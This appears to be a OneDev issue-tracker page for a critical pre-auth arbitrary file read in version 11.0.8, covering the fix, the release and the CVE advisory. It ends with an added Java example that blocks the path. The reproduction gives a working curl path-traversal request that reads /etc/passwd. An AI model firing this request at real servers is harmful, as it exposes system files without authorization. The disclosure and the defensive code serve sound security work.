-
| Name | Previous Value | Current Value |
| Assignee | robin | empty |
-
| Name | Previous Value | Current Value |
| Assignee | empty | robin |
-
Thank you. This will be fixed soon.
-
OneDev
changed state to 'Closed' 1 year ago
| Previous Value | Current Value |
| Open | Closed |
-
State changed as code fixing the issue is committed (4637aaac)
-
OneDev
changed state to 'Released' 1 year ago
| Previous Value | Current Value |
| Closed | Released |
-
State changed as build OD-5432 is successful
-
Hello, I would like to know if OneDev will apply for a CVE for this issue. I hope to be credited under the name 'Siebene@'
-
Yes, I am requesting a CVE via GHSA. Will publish it after one month to give OneDev users a window to upgrade.
-
| Previous Value | Current Value |
| true | false |
-
@siebene I published the CVE and credited you: https://github.com/theonedev/onedev/security/advisories/GHSA-7wg5-6864-v489
Thanks again for your report.
| Type | Security Vulnerability |
| Priority | Critical |
| Assignee | |
| Labels | No labels |
Arbitrary file reading exists in OneDev 11.0.8 (latest)
This vulnerability does not require authentication; it is pre-auth and has a severe impact.
What steps will reproduce the problem?
curl http://localhost:7576/test/~site////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
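A defensive check for the request shape in the reproduction above, as an added example that is not part of the original report and is not OneDev's actual fix: it decodes the sub-path once, normalizes it, and serves the file only if the result stays under the site directory. The class `SitePathGuard`, the method `resolve` and the directory `/srv/example/site` are hypothetical names chosen for illustration.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Optional;

public class SitePathGuard {
    // Hypothetical directory of published site files (an assumption, not a OneDev path).
    static final Path SITE_ROOT = Paths.get("/srv/example/site").toAbsolutePath().normalize();

    /** Maps the request path after "~site" to a file, or empty if it would leave SITE_ROOT. */
    static Optional<Path> resolve(String rawSubPath) {
        try {
            // Decode exactly once so "%2e%2e" is checked as "..". URLDecoder is a form
            // decoder, so protect a literal '+' from being turned into a space.
            String decoded = URLDecoder.decode(rawSubPath.replace("+", "%2B"), StandardCharsets.UTF_8);
            // Strict choice: anything still encoded after one pass, NUL and backslash are refused.
            if (decoded.contains("%") || decoded.indexOf('\0') >= 0 || decoded.contains("\\")) {
                return Optional.empty();
            }
            // Drop leading slashes: Path.resolve() returns an absolute argument unchanged.
            String relative = decoded.replaceFirst("^/+", "");
            // normalize() collapses "." and ".." segments and repeated separators.
            Path candidate = SITE_ROOT.resolve(relative).normalize();
            // Path.startsWith compares whole name elements, not string prefixes.
            // Symlinks are not followed here; compare toRealPath() results if they can exist.
            return candidate.startsWith(SITE_ROOT) ? Optional.of(candidate) : Optional.empty();
        } catch (IllegalArgumentException e) {
            // Malformed percent escape, or a path the file system rejects (InvalidPathException).
            return Optional.empty();
        }
    }

    public static void main(String[] args) {
        String[] samples = { // constructed inputs; the second is the sub-path from the report
            "/docs/index.html",
            "////////%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd",
            "/docs/%252e%252e/secret",
            "/docs/../index.html",
        };
        for (String s : samples) {
            System.out.println(s + " -> " + resolve(s).map(Path::toString).orElse("REJECTED"));
        }
    }
}
```

The first and last samples resolve inside the site directory; the sub-path from the report and the double-encoded variant are rejected.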